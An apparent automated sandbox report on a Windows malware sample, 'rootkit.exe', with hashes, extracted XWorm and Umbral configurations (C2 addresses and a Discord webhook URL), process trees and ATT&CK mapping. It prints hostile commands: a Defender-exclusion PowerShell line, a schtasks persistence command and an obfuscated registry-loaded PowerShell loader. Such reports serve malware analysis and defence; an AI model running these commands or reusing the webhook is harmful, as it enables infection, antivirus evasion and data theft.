Analysis
-
max time kernel
149s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 01:14
Static task
static1
Behavioral task
behavioral1
Sample
rootkit.exe
Resource
win7-20240705-en
General
-
Target
rootkit.exe
-
Size
274KB
-
MD5
87119ce97d460721e8c6cb98f990c780
-
SHA1
eac69d7550546b7812eb5701e82e079ff780d93a
-
SHA256
f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
-
SHA512
fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb
-
SSDEEP
6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo
Malware Config
Extracted
xworm
5.0
127.0.0.1:49403
quotes-suites.gl.at.ply:49403
quotes-suites.gl.at.ply.gg:49403
25nhnSSJeo8OHnH7
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
umbral
https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000014d97-13.dat family_umbral behavioral1/memory/780-15-0x0000000000DE0000-0x0000000000E20000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000f000000011b9c-5.dat family_xworm behavioral1/memory/2976-10-0x00000000010A0000-0x00000000010B0000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2600 created 432 2600 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2248 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2976 www.DeadSecObbbfuscation.exe 780 Modify.exe 2876 www.DeadSec0000000000-obfusecator.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" rootkit.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2600 set thread context of 2340 2600 powershell.EXE 41 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0d0bc599dd1da01 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2784 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2248 powershell.exe 2600 powershell.EXE 2600 powershell.EXE 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1252 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2976 www.DeadSecObbbfuscation.exe Token: SeDebugPrivilege 780 Modify.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeDebugPrivilege 2600 powershell.EXE Token: SeDebugPrivilege 2600 powershell.EXE Token: SeDebugPrivilege 2340 dllhost.exe Token: SeAuditPrivilege 864 svchost.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 1988 wrote to memory of 2976 1988 rootkit.exe 31 PID 1988 wrote to memory of 2976 1988 rootkit.exe 31 PID 1988 wrote to memory of 2976 1988 rootkit.exe 31 PID 1988 wrote to memory of 780 1988 rootkit.exe 32 PID 1988 wrote to memory of 780 1988 rootkit.exe 32 PID 1988 wrote to memory of 780 1988 rootkit.exe 32 PID 1988 wrote to memory of 2248 1988 rootkit.exe 33 PID 1988 wrote to memory of 2248 1988 rootkit.exe 33 PID 1988 wrote to memory of 2248 1988 rootkit.exe 33 PID 1988 wrote to memory of 2784 1988 rootkit.exe 35 PID 1988 wrote to memory of 2784 1988 rootkit.exe 35 PID 1988 wrote to memory of 2784 1988 rootkit.exe 35 PID 1988 wrote to memory of 2876 1988 rootkit.exe 37 PID 1988 wrote to memory of 2876 1988 rootkit.exe 37 PID 1988 wrote to memory of 2876 1988 rootkit.exe 37 PID 1988 wrote to memory of 2876 1988 rootkit.exe 37 PID 2240 wrote to memory of 2600 2240 taskeng.exe 39 PID 2240 wrote to memory of 2600 2240 taskeng.exe 39 PID 2240 wrote to memory of 2600 2240 taskeng.exe 39 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2600 wrote to memory of 2340 2600 powershell.EXE 41 PID 2340 wrote to memory of 432 2340 dllhost.exe 5 PID 2340 wrote to memory of 480 2340 dllhost.exe 6 PID 2340 wrote to memory of 488 2340 dllhost.exe 7 PID 2340 wrote to memory of 496 2340 dllhost.exe 8 PID 2340 wrote to memory of 612 2340 dllhost.exe 9 PID 2340 wrote to memory of 692 2340 dllhost.exe 10 PID 2340 wrote to memory of 772 2340 dllhost.exe 11 PID 2340 wrote to memory of 820 2340 dllhost.exe 12 PID 612 wrote to memory of 448 612 svchost.exe 42 PID 612 wrote to memory of 448 612 svchost.exe 42 PID 612 wrote to memory of 448 612 svchost.exe 42 PID 2340 wrote to memory of 448 2340 dllhost.exe 42 PID 2340 wrote to memory of 864 2340 dllhost.exe 13 PID 2340 wrote to memory of 976 2340 dllhost.exe 15 PID 2340 wrote to memory of 284 2340 dllhost.exe 16 PID 2340 wrote to memory of 492 2340 dllhost.exe 17 PID 2340 wrote to memory of 1040 2340 dllhost.exe 18 PID 2340 wrote to memory of 1120 2340 dllhost.exe 19 PID 2340 wrote to memory of 1188 2340 dllhost.exe 20 PID 2340 wrote to memory of 1252 2340 dllhost.exe 21 PID 2340 wrote to memory of 1404 2340 dllhost.exe 23 PID 2340 wrote to memory of 1736 2340 dllhost.exe 24 PID 2340 wrote to memory of 832 2340 dllhost.exe 25 PID 2340 wrote to memory of 2560 2340 dllhost.exe 26 PID 2340 wrote to memory of 1924 2340 dllhost.exe 27 PID 2340 wrote to memory of 2976 2340 dllhost.exe 31 PID 2340 wrote to memory of 780 2340 dllhost.exe 32 PID 2340 wrote to memory of 2240 2340 dllhost.exe 38 PID 2340 wrote to memory of 2600 2340 dllhost.exe 39 PID 2340 wrote to memory of 2596 2340 dllhost.exe 40 PID 2340 wrote to memory of 448 2340 dllhost.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ba3e326a-1696-43fe-90a8-83710c76090d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2340
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1404
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:832
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:448
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:692
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:772
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1188
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\system32\taskeng.exetaskeng.exe {98CBFCCB-028E-4AA4-944D-BD5B9581CD23} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+'st'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:976
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:284
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:492
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1040
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1120
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1736
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2560
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1924
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\rootkit.exe"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Users\Admin\AppData\Local\Temp\Modify.exe"C:\Users\Admin\AppData\Local\Temp\Modify.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2784
-
-
C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"3⤵
- Executes dropped EXE
PID:2876
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5051511122106885354-846861541234880637129283130861032109-929670289-1544716396"1⤵PID:2596
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
164KB
MD522d120454dd38d7f1a3f1cd0eb497f95
SHA14c11a082bf8e64b21310b959821a9f7324aa8107
SHA2566fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA5121552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9
-
Filesize
229KB
MD59259d8aef8f52e8ff4fa082c0074c9b0
SHA188abb68a5632812be3c18e0c740e3818d9501b3e
SHA25645d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA5129cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede
-
Filesize
42KB
MD5737b2d60dc5d475685b65f5c288e00c0
SHA1144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA25669c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA51296a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6